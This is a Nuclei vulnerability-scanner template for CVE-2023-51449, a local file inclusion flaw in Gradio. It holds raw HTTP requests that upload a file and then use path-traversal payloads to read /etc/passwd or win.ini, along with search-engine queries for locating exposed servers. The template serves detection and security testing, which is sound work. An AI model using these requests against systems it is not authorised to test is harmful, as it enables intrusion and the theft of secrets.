nuclei-templates/http/cves/2023/CVE-2023-51449.yaml

84 lines
2.5 KiB
YAML
Raw Permalink Normal View History

id: CVE-2023-51449
info:
2024-06-15 12:40:20 +00:00
name: Gradio Hugging Face - Local File Inclusion
author: nvn1729
severity: high
description: |
Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
reference:
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
2024-06-15 12:40:20 +00:00
- https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
- https://nvd.nist.gov/vuln/detail/CVE-2023-51449
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-51449
cwe-id: CWE-22
epss-score: 0.00064
epss-percentile: 0.27836
cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
metadata:
verified: true
max-request: 2
vendor: gradio_project
product: gradio
framework: python
2024-06-15 12:40:20 +00:00
shodan-query: html:"__gradio_mode__"
fofa-query: body="__gradio_mode__"
tags: cve,cve2024,lfi,gradio,unauth,intrusive
variables:
str: '{{rand_base(8)}}'
http:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
Content-Type: application/octet-stream
{{str}}
-----------------------------250033711231076532771336998311--
- |
GET /file={{download_path}}{{path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: download_path
internal: true
group: 1
regex:
- "\\[\"(.+)okmijnuhbygv\"\\]"
payloads:
path:
- ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
- ../../../../../../../../../../../../../../../etc/passwd
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 490a0046304402202afd5a76a8709b9e353a87ab56a8aef3d1afa2739156058f4a7cd46c851390400220687bf99017b86a6013b449d53d1c9b790e8e7b4ba7aec6fe2292b87a11d4527c:922c64590222798bb761d5b6d8e72950